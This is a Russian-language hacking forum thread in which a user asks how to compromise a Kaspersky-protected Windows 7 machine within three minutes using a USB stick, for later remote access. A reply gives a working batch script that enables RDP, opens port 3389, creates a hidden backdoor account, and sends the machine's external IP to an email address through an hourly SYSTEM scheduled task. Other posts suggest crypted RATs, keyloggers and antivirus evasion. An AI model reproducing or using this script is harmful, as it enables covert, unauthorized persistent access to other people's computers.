• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

скомпрометировать windows 7, за 3 минуты

Bush_Kape

Green Team
24.01.2018
37
8
BIT
0
Всем доброго времени суток!
описание ситуации:
1)стоит машина под управлением windows 7
2)обновленный Касперский под паролем
3)пароль администратора стоит
4)разрешение на запуск exe есть
5)есть меньше 3 минут на манипуляции
6)есть флешка, которую можно применить
Сам вопрос: какие возможные действия, или что вы бы сделали, для получения бреши, для дальнейшего удаленного взлома, или есть варианты моментального обхода Касперского?
за любые идеи буду благодарен, за ранее спасибо!
 

Sunnych

Mod. Forensics
Gold Team
01.06.2018
277
1 454
BIT
41
Всем доброго времени суток!
описание ситуации:
за любые идеи буду благодарен, за ранее спасибо!
и посмотри его видосы и выбери что конкретно хочешь сделать
 
V

Valkiria

Сам вопрос: какие возможные действия, или что вы бы сделали, для получения бреши, для дальнейшего удаленного взлома, или есть варианты моментального обхода Касперского?
Воспользуйся возможностями системы Windows и ничего не изобретай.
Если у машины - статический адрес, ТО:
  1. Создай пользователя с правами администратора и разреши ему удалённое подключение к этой машине по протоколу RDP. Для этого достаточно запустить батник - достаточно одной минуты и Касперский равнодушен.
Если адрес у машины - динамический, то выполни пункт 1 и переходи к пункту 2.

2. Установи программу, которая будет высылать тебе на ftp или e-mail IP-адрес желаемого компа.

Таким образом, у тебя появится возможность всегда подключиться к удалённому рабочему столу этого компутера.
Здесь возникает проблема: если твоя машина за NAT-ом (выход в инет при помощи мобильного оператора связи через 3g или 4G), то фокус может не прокатить.
 
  • Нравится
Реакции: Глюк и Bush_Kape

Bush_Kape

Green Team
24.01.2018
37
8
BIT
0
Воспользуйся возможностями системы Windows и ничего не изобретай.
Если у машины - статический адрес, ТО:
  1. Создай пользователя с правами администратора и разреши ему удалённое подключение к этой машине по протоколу RDP. Для этого достаточно запустить батник - достаточно одной минуты и Касперский равнодушен.
Если адрес у машины - динамический, то выполни пункт 1 и переходи к пункту 2.

2. Установи программу, которая будет высылать тебе на ftp или e-mail IP-адрес желаемого компа.

Таким образом, у тебя появится возможность всегда подключиться к удалённому рабочему столу этого компутера.
Здесь возникает проблема: если твоя машина за NAT-ом (выход в инет при помощи мобильного оператора связи через 3g или 4G), то фокус может не прокатить.
об этом кстати, не думал. По поводу второго пункта, так не делал, а какие посоветуешь программные решения, которые более менее не палятся, хотя бы до того момента пока не подключусь и не снесу Каспера, и еще есть ли такие решения, которые сразу ставятся с моими настройками ftp или уже в битой почтой, так как время очень драгоценно.
 
V

Valkiria

Всё это просто реализовать обыкновенным батником, воспользовавшись стандартными программами Windows.
Код:
@REM Включаем дистанционное управление рабочим столом
@REM Ставим галочку на Мой компьютер=>Свойства=>Удаленные сеансы=>Разрешить удаленный доступ к этому компьютеру
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REM Эти 2 команды отвечают за разрешения двух учетных записей вход
reg add "HKLM\SYSTEM\CurrentControlSet\Contr ol\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REM Эта строка отвечает за путь файла termsrv.dll
reg add "HKLM\SYSTEM\CurrentControlSet\services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d %SYSTEMROOT%\System32\termsrv.dll /f
@REM Заносим в Windows брат маузер запись что порт этот добрый
netsh firewall set portopening protocol=TCP port=3389
@REM делаем UserHelp участником группы Пользователи удаленного рабочего стола
net user UserHelp ТУТ_ПАРОЛЬ /add
net user UserHelp /comment:"Windows System User Help" /fullname:"Windows Help"
net localgroup "Пользователи удаленного рабочего стола" "UserHelp" /add
@REM Прячем нашу запись UserHelp
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v UserHelp /t REG_DWORD /d 00000000 /f

Правда, нужно будет воспользоваться несколькими сторонними консольными программами.
В частности, узнать адрес удалённой машины можно с помощью приведенной ниже команды.
Программу wget заранее нужно скачать на флэшку, которой ты планируешь воспользоваться и прописать в батнике команду для копирования её в системные папки windows.

Код:
move /y "wget.exe" "%SYSTEMROOT%\system32\wget.exe"
wget -O - -q icanhazip.com > c:\11.txt

Выслать на почту этот текстовый файл с адресом тебе может помочь программа blat.

Код:
move /y "blat.exe" "%SYSTEMROOT%\system32\blat.exe"
move /y "blat.lib" "%SYSTEMROOT%\system32\blat.lib"
move /y "blat.dll" "%SYSTEMROOT%\system32\blat.dll
move /y "blatdll.h" "%SYSTEMROOT%\system32\blatdll.h
%SYSTEMROOT%\System32\blat.exe C:\11.txt -subject %computername% -to адрес_ящика@mail.ru
del C:\11.txt

Осталось только воспользоваться планировщиком заданий windows и прописать команду для регулярной (в примере ежечасной) отправки тебе на электроящик текстового файла с адресом удалённой машины.
Код:
schtasks /create /tn "security" /sc minute /mo 60 /ru "NT AUTHORITY\SYSTEM" /tr %systemroot%\system32\rm\ip.bat /f

Для того, чтобы консольные окна не показывались во время работы этих программ, существуют также программные решения.
Для сокрытия окон командной строки в сети достаточно программ для скачивания ))



PostScriptum.
Примерно два месяца назад мне на глаза совершенно случайно попадалась программа, которая проделывала все эти мои описанные действия. Программа была бесплатная. Но дело было ночью, я уже ничего не соображала. Поэтому, адрес благополучно затеряла - а жаль. Может найду - выложу.
Кроме того, примерно год назад на хак-форумах распространялась софтина, которая занималась этими-же фокусами )) Но та была платной и приватной ))

PostScriptum ver_ 2.0
Кроме того, для достижения цели ты можешь воспользоваться любым ратником, предварительно закриптовав его.
 
Последнее редактирование модератором:

Bush_Kape

Green Team
24.01.2018
37
8
BIT
0
Всё это просто реализовать обыкновенным батником, воспользовавшись стандартными программами Windows.
Код:
@REM Включаем дистанционное управление рабочим столом
@REM Ставим галочку на Мой компьютер=>Свойства=>Удаленные сеансы=>Разрешить удаленный доступ к этому компьютеру
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REM Эти 2 команды отвечают за разрешения двух учетных записей вход
reg add "HKLM\SYSTEM\CurrentControlSet\Contr ol\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REM Эта строка отвечает за путь файла termsrv.dll
reg add "HKLM\SYSTEM\CurrentControlSet\services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d %SYSTEMROOT%\System32\termsrv.dll /f
@REM Заносим в Windows брат маузер запись что порт этот добрый
netsh firewall set portopening protocol=TCP port=3389
@REM делаем UserHelp участником группы Пользователи удаленного рабочего стола
net user UserHelp 230969230969 /add
net user UserHelp /comment:"Windows System User Help" /fullname:"Windows Help"
net localgroup "Пользователи удаленного рабочего стола" "UserHelp" /add
@REM Прячем нашу запись UserHelp
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v UserHelp /t REG_DWORD /d 00000000 /f

Правда, нужно будет воспользоваться несколькими сторонними консольными программами.
В частности, узнать адрес удалённой машины можно с помощью приведенной ниже команды.
Программу wget заранее нужно скачать на флэшку, которой ты планируешь воспользоваться и прописать в батнике команду для копирования её в системные папки windows.

Код:
move /y "wget.exe" "%SYSTEMROOT%\system32\wget.exe"
wget -O - -q icanhazip.com > c:\11.txt

Выслать на почту этот текстовый файл с адресом тебе может помочь программа blat.

Код:
move /y "blat.exe" "%SYSTEMROOT%\system32\blat.exe"
move /y "blat.lib" "%SYSTEMROOT%\system32\blat.lib"
move /y "blat.dll" "%SYSTEMROOT%\system32\blat.dll
move /y "blatdll.h" "%SYSTEMROOT%\system32\blatdll.h
%SYSTEMROOT%\System32\blat.exe C:\11.txt -subject %computername% -to адрес_ящика@mail.ru
del C:\11.txt

Осталось только воспользоваться планировщиком заданий windows и прописать команду для регулярной (в примере ежечасной) отправки тебе на электроящик текстового файла с адресом удалённой машины.
Код:
schtasks /create /tn "security" /sc minute /mo 60 /ru "NT AUTHORITY\SYSTEM" /tr %systemroot%\system32\rm\ip.bat /f

Для того, чтобы консольные окна не показывались во время работы этих программ, существуют также программные решения.
Для сокрытия окон командной строки в сети достаточно программ для скачивания ))



PostScriptum.
Примерно два месяца назад мне на глаза совершенно случайно попадалась программа, которая проделывала все эти мои описанные действия. Программа была бесплатная. Но дело было ночью, я уже ничего не соображала. Поэтому, адрес благополучно затеряла - а жаль. Может найду - выложу.
Кроме того, примерно год назад на хак-форумах распространялась софтина, которая занималась этими-же фокусами )) Но та была платной и приватной ))

PostScriptum ver_ 2.0
Кроме того, для достижения цели ты можешь воспользоваться любым ратником, предварительно закриптовав его.
по поводу криптования, у меня есть свой рмс тихий, его не детектят, но при запуске Касперский сразу же сжирает, а по поводу остального спасибо огромное!
 
  • Нравится
Реакции: Valkiria
V

Valkiria

по поводу криптования, у меня есть свой рмс тихий, его не детектят, но при запуске Касперский сразу же сжирает,
Вот ссылка на статью, где ты можешь задать вопросы по своей проблеме.
Как обойти антивирусную защиту после компрометации системы


По поводу криптования, могу лишь шёпотом дать совет: поработай над своей репутацией на форуме, переходи в "серую" группу.
Там, в закрытой части форума имеется достаточно инфы о криптовании ратников ))
Можешь считать это стимулом для развития ))
Больше ничем помочь не могу, извиняй ((
 
13.01.2018
26
15
BIT
2
"...PostScriptum.
Примерно два месяца назад мне на глаза совершенно случайно попадалась программа, которая проделывала все эти мои описанные действия. ..."

Кому она нужна, если есть такое простое и изящное решение. Спасибо, порадовало. Готов спеть под Вашими окнами "Венец творенья - дивная Valkiria". А если серьезно, Вы - чудо этого форума.
Вообще, IMHO, если есть хорошая возможность, лучше пользоваться средствами самой системы и не городить ненужный огород. В свое время писал коды прямо в стандартном debuge. На выходе получаем .com файл и запускаем свою TSR-задачу. Приятная ностальгия...
 

CHEATER

Green Team
09.09.2017
79
43
BIT
0
Можно сделать отстук сюда:
Тогда wget и blat уже не нужны. (Гипотеза)
 

Bush_Kape

Green Team
24.01.2018
37
8
BIT
0
а чтобы ip не спалить, можно юзать no-ip.com
да, только осталось с Касперским договорится

Можно сделать отстук сюда:
Тогда wget и blat уже не нужны. (Гипотеза)
эта связка не работает, так как каспер блочит rdp соединение
 
L

Langolier

эта связка не работает, так как каспер блочит rdp соединение
А что ещё он блочит ?
Ты -бы сразу список огласил, чтобы не постить лишнего ))

Можно ещё ратник становить с флэшки, можно кейлоггер установить с флэшки. можно team viewer установить с флэшки и прочей ерунды.
Можно заставить отправлять сообщения на почту не программой блат, а с помощью телнета и powershell.
Это всё тоже блочит каспер ?
 

Bush_Kape

Green Team
24.01.2018
37
8
BIT
0
А что ещё он блочит ?
Ты -бы сразу список огласил, чтобы не постить лишнего ))

Можно ещё ратник становить с флэшки, можно кейлоггер установить с флэшки. можно team viewer установить с флэшки и прочей ерунды.
Можно заставить отправлять сообщения на почту не программой блат, а с помощью телнета и powershell.
Это всё тоже блочит каспер ?
1)зачем кейлоггер если мне нужен полный доступ к компу
2) можно и тимку установить только это палево, и времени нужно больше чем 3 минуты
3) не в отправке сообщений дело, а в том что rdp соединения не пропускает каспер
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!